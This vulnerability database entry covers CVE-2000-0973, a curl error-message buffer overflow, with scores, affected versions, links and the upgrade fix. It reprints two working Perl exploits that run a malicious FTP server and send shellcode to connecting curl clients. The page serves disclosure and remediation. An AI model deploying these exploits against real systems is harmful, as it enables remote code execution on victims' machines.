CVE-2000-0973
CVSS 10.0
Published: 2000-12-19 00:00:00
Revised: 2008-09-05 16:22:19

[Original] Buffer overflow in curl earlier than 6.0-1.1, and curl-ssl earlier than 6.0-1.2, allows remote attackers to execute arbitrary commands by forcing a long error message to be generated.


[CNNVD] curl buffer overflow vulnerability (CNNVD-200012-172)

curl versions before 6.0-1.1 and curl-ssl versions before 6.0-1.2 contain a buffer overflow vulnerability. A remote attacker can execute arbitrary commands by forcing the generation of an overly long error message.

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/a:daniel_stenberg:curl:7.4
cpe:/a:daniel_stenberg:curl:7.2.1
cpe:/a:daniel_stenberg:curl:6.4
cpe:/a:daniel_stenberg:curl:7.3
cpe:/a:daniel_stenberg:curl:6.5.1
cpe:/a:daniel_stenberg:curl:7.1.1
cpe:/a:daniel_stenberg:curl:7.1
cpe:/a:daniel_stenberg:curl:6.5.2
cpe:/a:daniel_stenberg:curl:6.0
cpe:/a:daniel_stenberg:curl:7.2
cpe:/a:daniel_stenberg:curl:6.1
cpe:/a:daniel_stenberg:curl:6.3
cpe:/a:daniel_stenberg:curl:6.1beta
cpe:/a:daniel_stenberg:curl:6.5

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0973
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0973
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200012-172
(official data source) CNNVD

- Other links and resources

http://xforce.iss.net/static/5374.php
(VENDOR_ADVISORY)  XF  curl-error-bo
http://www.securityfocus.com/bid/1804
(VENDOR_ADVISORY)  BID  1804
http://archives.neohapsis.com/archives/bugtraq/2000-10/0331.html
(UNKNOWN)  REDHAT  RHBA-2000:092-01
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-00:72.curl.asc
(UNKNOWN)  FREEBSD  FreeBSD-SA-00:72

- Vulnerability information

curl buffer overflow vulnerability
Critical  Buffer overflow
2000-12-19 00:00:00 2005-05-02 00:00:00
Remote
curl versions before 6.0-1.1 and curl-ssl versions before 6.0-1.2 contain a buffer overflow vulnerability. A remote attacker can execute arbitrary commands by forcing the generation of an overly long error message.

- Advisories and patches

        

- Vulnerability information (20292)

cURL 6.1 - 7.4 Remote Buffer Overflow Vulnerability (1) (EDBID:20292)
freebsd remote
2000-10-13 Verified
0 zillion
N/A
source: http://www.securityfocus.com/bid/1804/info

Curl is an open-source utility for sending or receiving files using URL syntax. A vulnerability exists in the version of curl included with Debian GNU/Linux 2.2 and FreeBSD (prior to 4.2 release). 

Note that cURL runs on other platforms as well, and earlier versions may also be vulnerable.

Curl's error-logging feature improperly tests the size of generated error messages, which are sent from a remote host. A malicious remote server could send a maliciously-formed response to a request from curl, designed to exceed the maximum length of the error buffer. The contents of this oversized buffer, when copied onto the stack, can potentially overwrite the calling functions' return address. This can alter the program's flow of execution and result in arbitrary code being run on the client host.

#!/usr/bin/perl
#
# Remote FreeBSD cURL exploit for versions 6.1 - 7.4
#
# Written by zillion (at http://www.safemode.org && http://www.xsnosoft.com)
#
# This exploit may only be used for testing purposes. More information 
# about the used vulnerability can be found on securityfocus:
#
# http://online.securityfocus.com/bid/1804
#
# The shellcode will write "Ha! Owned by a cURL!" to stdout on the system
# running cURL. The extra nops are needed because the buffer, which causes
# the overflow, is altered.
#
# $ ./curl -s ftp://xxx.xxx.xxx.xxx:21/
# Ha! Owned by a cURL! 

use IO::Socket;
use Net::hostent;

########################################################################

$shellcode = 
        "\xeb\x14\x5e\x31\xc0\x6a\x14\x56\x40\x40\x50\xb0\x04\x50\xcd".
        "\x80\x31\xc0\x40\x50\xcd\x80\xe8\xe7\xff\xff\xff\x48\x61\x21".
        "\x20\x4f\x77\x6e\x65\x64\x20\x62\x79\x20\x61\x20\x63\x55\x52".
        "\x4c\x21\x23".
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";

while($_ = $ARGV[0], /^-/) {
    shift;       
    last if /^--$/;
    /^-p/ && do { $port = shift; };
    /^-l/ && do { $list = 1; };
    /^-o/ && do { $offset = shift; };
}


$id     = `id -u`; chop($id);
$size   =  225;
$esp    =  0xbfbffbd4;
$offset =  -140 unless $offset;
$port   =  21 unless $port;

# Show usage unless -l was given; binding a port below 1024 needs root.
if(!$list || ($port < 1024 && $id != 0)) {

print <<"TWENTE";

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+

   Usage :  $0 -l 
   Option:  $0 -p <port to listen on>
   Option:  $0 -o <offset>

   Note: low ports require root privileges

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+

TWENTE
exit;

}

for ($i = 0; $i < ($size - length($shellcode)) - 4; $i++) {
    $buffer .= "\x90";
}

$buffer .= $shellcode;
$buffer .= pack('l', ($esp + $offset)); 

# Print the same address that was packed into the buffer above ($esp + $offset).
print("We are using return address: 0x", sprintf('%lx', ($esp + $offset)), "\n");
print "Starting to listen for incoming connections on port $port\n";

my $sock = new IO::Socket::INET (
                                 LocalPort => $port,
                                 Proto => 'tcp',
                                 Listen => 1,
                                 Reuse => 1,
                                );
die "Could not create socket: $!\n" unless $sock;

while($cl = $sock->accept()) {

   $hostinfo = gethostbyaddr($cl->peeraddr);
   printf "[Received connect from %s]\n", $cl->peerhost;
   print $cl "220 Safemode.org FTP server (Version 666) ready.\n";
   print $cl "230 Ok\n";
   print $cl "227 $buffer\n";
   sleep 2;

}

- Vulnerability information (20293)

cURL 6.1 - 7.4 Remote Buffer Overflow Vulnerability (2) (EDBID:20293)
linux remote
2000-10-13 Verified
0 zillion
N/A
source: http://www.securityfocus.com/bid/1804/info
 
Curl is an open-source utility for sending or receiving files using URL syntax. A vulnerability exists in the version of curl included with Debian GNU/Linux 2.2 and FreeBSD (prior to 4.2 release).
 
Note that cURL runs on other platforms as well, and earlier versions may also be vulnerable.
 
Curl's error-logging feature improperly tests the size of generated error messages, which are sent from a remote host. A malicious remote server could send a maliciously-formed response to a request from curl, designed to exceed the maximum length of the error buffer. The contents of this oversized buffer, when copied onto the stack, can potentially overwrite the calling functions' return address. This can alter the program's flow of execution and result in arbitrary code being run on the client host.

#!/usr/bin/perl
#
# Remote linux cURL exploit for versions 6.1 - 7.4
#
# Written by zillion (at http://safemode.org && http://www.snosoft.com)
# 
# This exploit, which has been tested to work with cURL 6.4, 7.2 and 7.3,  
# may only be used for testing purposes. Additionally, the author does not 
# take any responsibilities for abuse of this file. More information about  
# the used vulnerability can be found on securityfocus:
#
# http://online.securityfocus.com/bid/1804
#
# The shellcode will write "Owned by a cURL ;)" to the file /tmp/0wned.txt
# You can replace it with whatever you want but be warned: due to buffer 
# manipulation working shellcode might be altered.
#
# A FreeBSD version is also available on safemode.org

use IO::Socket;
use Net::hostent;

$shellcode = # does a open() write() close() and exit(). 
        "\xeb\x40\x5e\x31\xc0\x88\x46\x0e\xc6\x46\x21\x09\xfe\x46\x21".
        "\x88\x46\x22\x8d\x5e\x0f\x89\x5e\x23\xb0\x05\x8d\x1e\x66\xb9".
        "\x42\x04\x66\xba\xe4\x01\xcd\x80\x89\xc3\xb0\x04\x8b\x4e\x23".
        "\x66\xba\x0f\x27\x66\x81\xea\xfc\x26\xcd\x80\xb0\x06\xcd\x80".
        "\xb0\x01\x31\xdb\xcd\x80\xe8\xbb\xff\xff\xff\x2f\x74\x6d\x70".
        "\x2f\x30\x77\x6e\x65\x64\x2e\x74\x78\x74\x23\x30\x77\x6e\x65".
        "\x64\x20\x62\x79\x20\x61\x20\x63\x55\x52\x4c\x20\x3b\x29";

while($_ = $ARGV[0], /^-/) {
    shift;       
    last if /^--$/;
    /^-p/ && do { $port = shift; };
    /^-l/ && do { $list = 1; };
    /^-o/ && do { $offset = shift; };
}


$id     = `id -u`; chop($id);
$size   =  249;
$esp    =  0xbffff810;
$offset =  -150 unless $offset;
$port   =  21 unless $port;

# Show usage unless -l was given; binding a port below 1024 needs root.
if(!$list || ($port < 1024 && $id != 0)) {

print <<"TWENTE";

   Usage :  $0 -l 
   Option:  $0 -p <port to listen on>
   Option:  $0 -o <offset>

   Note: low ports require root privileges

TWENTE
exit;

}

for ($i = 0; $i < ($size - length($shellcode)) - 4; $i++) {
    $buffer .= "\x90";
}

$buffer .= "$shellcode";
$buffer .= pack('l', ($esp + $offset)); 

# Print the same address that was packed into the buffer above ($esp + $offset).
print("Listening on port $port. We are using return address: 0x", sprintf('%lx', ($esp + $offset)), "\n");

my $sock = new IO::Socket::INET (
                                 LocalPort => $port,
                                 Proto => 'tcp',
                                 Listen => 1,
                                 Reuse => 1,
                                );
die "Could not create socket: $!\n" unless $sock;

while($cl = $sock->accept()) {

   $hostinfo = gethostbyaddr($cl->peeraddr);
   # gethostbyaddr returns undef when reverse lookup fails; fall back to the IP.
   printf "[Received connect from %s]\n", ($hostinfo && $hostinfo->name) || $cl->peerhost;
   print $cl "220 Safemode.org FTP server (Version 666) ready.\n";
   print $cl "230 Ok\n";
   print $cl "227 $buffer\n";
   sleep 2;

}

- Vulnerability information

1612
cURL / curl-ssl Error Message Handling Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- Vulnerability description

cURL and cURL SSL contain an overflow condition in the handling of error messages. The issue is triggered as user-supplied input is not properly validated when handling error messages. With a specially crafted request causing an overly long error message, a remote attacker can cause a buffer overflow, resulting in a denial of service or potentially execution of arbitrary code.
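As an added defender-side illustration (not curl's code and not taken from the page's sources): the unchecked pattern the descriptions above attribute to curl's error handling, shown beside a bounded version that truncates and reports instead of overflowing. The buffer size, the prefix string and the sample response line are constructed assumptions for this example.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Buffer size, prefix and both routines are constructed for this example;
 * they are not curl's real constants or code. */
#define ERRBUF_SIZE 128
#define PREFIX "FTP server response: "

/* Unsafe pattern: the server-controlled line is formatted into a fixed
 * stack buffer with no length check. A line longer than the remaining
 * space writes past errbuf into adjacent stack data (saved registers,
 * the return address). Shown for contrast; never fed long input here. */
static void format_error_unsafe(char *errbuf, const char *server_line)
{
    sprintf(errbuf, PREFIX "%s", server_line);
}

/* Hardened pattern: snprintf bounds the write and reports how many bytes
 * the full message needed, so an over-long server line is truncated and
 * flagged instead of corrupting the stack. Returns true if it all fit;
 * errbuf is NUL-terminated either way. */
static bool format_error_safe(char *errbuf, size_t errbuf_size,
                              const char *server_line)
{
    int needed = snprintf(errbuf, errbuf_size, PREFIX "%s", server_line);
    if (needed < 0) {              /* encoding error: leave a valid empty string */
        errbuf[0] = '\0';
        return false;
    }
    return (size_t)needed < errbuf_size;
}

/* Constructed over-long "227 ..." response line of n bytes (caller's out holds n+1). */
static void build_long_response(char *out, size_t n)
{
    memset(out, 'A', n);
    memcpy(out, "227 ", 4);
    out[n] = '\0';
}

int main(void)
{
    char errbuf[ERRBUF_SIZE], line[512];
    format_error_unsafe(errbuf, "230 Ok");    /* short input: fits either way */
    build_long_response(line, 300);           /* 300 bytes aimed at a 128-byte buffer */
    bool fit = format_error_safe(errbuf, sizeof errbuf, line);
    printf("fit=%d len=%zu\n", fit, strlen(errbuf));   /* fit=0 len=127 */
    return 0;
}
```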

- Timeline

2000-10-13 Unknown
2000-10-13 2000-10-16

- Solution

Upgrade to version 7.4.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related references

- Vulnerability author

Unknown or Incomplete

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP.

Copyright notice

CVE, CWE and OVAL are registered trademarks of MITRE; their official data sources are kept on MITRE's websites.